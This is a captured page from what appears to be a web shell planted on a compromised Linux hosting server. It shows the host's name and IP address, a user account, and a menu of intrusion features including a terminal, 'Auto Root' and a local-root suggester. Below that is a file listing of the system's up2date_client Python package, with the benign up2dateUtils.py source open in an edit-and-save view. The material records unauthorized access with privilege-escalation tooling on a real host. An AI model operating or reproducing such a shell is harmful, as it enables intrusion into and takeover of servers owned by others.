Linux box325.rapidenet.ca 5.14.0-687.25.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Jul 13 11:40:33 EDT 2026 x86_64
LiteSpeed
Server IP : 68.168.116.250 & Your IP : 216.73.216.215
Domains :
Cant Read [ /etc/named.conf ]
User : protectionrat
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3.9 /
site-packages /
up2date_client /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2026-07-15 01:56
__init__.py
0
B
-rw-r--r--
2026-06-25 16:02
clpwd.py
3.56
KB
-rw-r--r--
2026-06-25 16:02
config.py
14.83
KB
-rw-r--r--
2026-06-25 16:02
hardware.py
5.09
KB
-rw-r--r--
2026-06-25 16:02
pkgplatform.py
309
B
-rw-r--r--
2026-06-25 18:54
rhncli.py
7.46
KB
-rw-r--r--
2026-06-25 16:02
rhnreg.py
11.64
KB
-rw-r--r--
2026-06-25 16:02
rhnserver.py
8.54
KB
-rw-r--r--
2026-06-25 16:02
rpcServer.py
11.55
KB
-rw-r--r--
2026-06-25 16:02
statistics.py
1.27
KB
-rw-r--r--
2026-06-25 16:02
up2dateAuth.py
13.1
KB
-rw-r--r--
2026-06-25 16:02
up2dateErrors.py
7.99
KB
-rw-r--r--
2026-06-25 16:02
up2dateLog.py
2.26
KB
-rw-r--r--
2026-06-25 16:02
up2dateUtils.py
1.7
KB
-rw-r--r--
2026-06-25 18:54
Save
Rename
# Client code for Update Agent # Copyright (c) 1999--2018 Red Hat, Inc. Distributed under GPLv2. # # Author: Preston Brown <pbrown@redhat.com> # Adrian Likins <alikins@redhat.com> # """utility functions for up2date""" import os import gettext import distro from up2date_client import config from up2date_client.pkgplatform import getPlatform t = gettext.translation('rhn-client-tools', fallback=True) # Python 3 translations don't have a ugettext method if not hasattr(t, 'ugettext'): t.ugettext = t.gettext _ = t.gettext def getVersion(): """ Returns the version of redhat-release rpm """ cfg = config.initUp2dateConfig() if cfg["versionOverride"]: return str(cfg["versionOverride"]) if getPlatform() == 'deb': return distro.codename() return distro.major_version() def getOSRelease(): """ Returns the name of the system """ if getPlatform() == 'deb': return 'Ubuntu' return "CloudLinux" def getArch(): if os.access("/etc/rpm/platform", os.R_OK): fd = open("/etc/rpm/platform", "r") platform = fd.read().strip() #bz 216225 #handle some replacements.. replace = {"ia32e-redhat-linux": "x86_64-redhat-linux"} if platform in replace: platform = replace[platform] return platform arch = os.uname()[4] if getPlatform() == 'deb': # On debian we only support i386 if arch in ['i486', 'i586', 'i686']: arch = 'i386' if arch == 'x86_64': arch = 'amd64' arch += '-debian-linux' return arch def version(): # substituted to the real version by the Makefile at installation time. return "3.0.5-1.el9.cloudlinux"